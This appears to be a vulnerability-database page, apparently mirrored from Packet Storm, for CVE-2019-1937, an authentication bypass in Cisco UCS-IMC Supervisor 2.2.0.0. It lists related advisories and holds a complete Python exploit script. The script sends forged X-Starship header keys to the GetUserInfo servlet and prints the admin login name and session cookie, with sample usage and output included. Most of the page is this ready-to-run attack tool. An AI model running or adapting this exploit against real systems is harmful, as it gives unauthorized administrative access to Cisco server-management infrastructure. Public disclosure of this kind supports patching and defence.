Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

🗓️ 17 Jul 2023 00:00:00Reported by Fatih SencerType

packetstorm🔗 packetstormsecurity.com👁 265 Views

Cisco UCS-IMC Supervisor Authentication Bypass. Vulnerability discovered by Pedro Ribeiro, exploited by Fatih Sencer. Affected component: /app/ui/ClientServlet?apiName=GetUserInfo. CVE-2019-1937

Reporter	Title	Published	Views	Family All 22
0day.today	Cisco UCS Director, Cisco Integrated Management Controller Supervisor - Multiple Vulnerabilities	29 Aug 201900:00	–	zdt
0day.today	Cisco UCS Director Unauthenticated Remote Code Execution Exploit	2 Sep 201900:00	–	zdt
0day.today	Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass Vulnerability	15 Jul 202300:00	–	zdt
Circl	CVE-2019-1937	2 Sep 201915:56	–	circl
Cisco	Cisco Integrated Management Controller Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data Authentication Bypass Vulnerability	21 Aug 201916:00	–	cisco
Tenable Nessus	Cisco UCS Director Authentication Bypass (cisco-sa-20190821-imcs-ucs-authby)	26 Aug 201900:00	–	nessus
Check Point Advisories	Cisco UCS Director Web Interface Authentication Bypass (CVE-2019-1937)	16 Sep 201900:00	–	checkpoint_advisories
CVE	CVE-2019-1937	21 Aug 201918:25	–	cve
Cvelist	CVE-2019-1937 Cisco Integrated Management Controller Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data Authentication Bypass Vulnerability	21 Aug 201918:25	–	cvelist
Exploit DB	Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities	21 Aug 201900:00	–	exploitdb

`[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass  
[+] Cisco IMC Supervisor - < 2.2.1.0  
[+] Date: 08/21/2019  
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo  
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html  
[+] Vulnerability Discovery : Pedro Ribeiro  
[+] Exploit Author: Fatih Sencer  
[+] CVE: CVE-2019-1937  
----------------------------------------------------  
  
Usage:  
  
./python3 CiscoIMC-Bypass.py -u host  
  
[+] Target https://xxxxxx.com  
[+] Target OK  
[+] Exploit Succes  
[+] Login name : admin  
[+] Cookie : REACTED  
  
"""  
  
import argparse,requests,warnings,base64,json,random,string  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
warnings.simplefilter('ignore',InsecureRequestWarning)  
  
  
def init():  
parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')  
parser.add_argument('-u','--host',help='Host', type=str, required=True)  
args = parser.parse_args()  
exploit(args)  
  
def exploit(args):  
session = requests.Session()  
headers = {  
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",  
"X-Requested-With": "XMLHttpRequest",  
"Referer": "https://{}/".format(args.host),  
"X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),  
"X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))  
}  
target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)  
print("[+] Target {}".format(args.host))  
  
exp_send = session.get(target, headers=headers, verify=False, timeout=10)  
  
if exp_send.status_code == 200:  
print("[+] Target OK")  
body_data = json.loads(exp_send.text)  
if not (body_data.get('loginName') is None):  
print("[+] Exploit Succes")  
print("[+] Login name : {}".format(body_data.get('loginName')))  
print("[+] Cookie : {}".format(session.cookies.get_dict()))  
else:  
print("[-] Exploit Failed")  
  
else:  
print("[-] N/A")  
exit()  
  
if __name__ == "__main__":  
init()  
  
  
`

17 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 39.8

CVSS 210

EPSS0.90491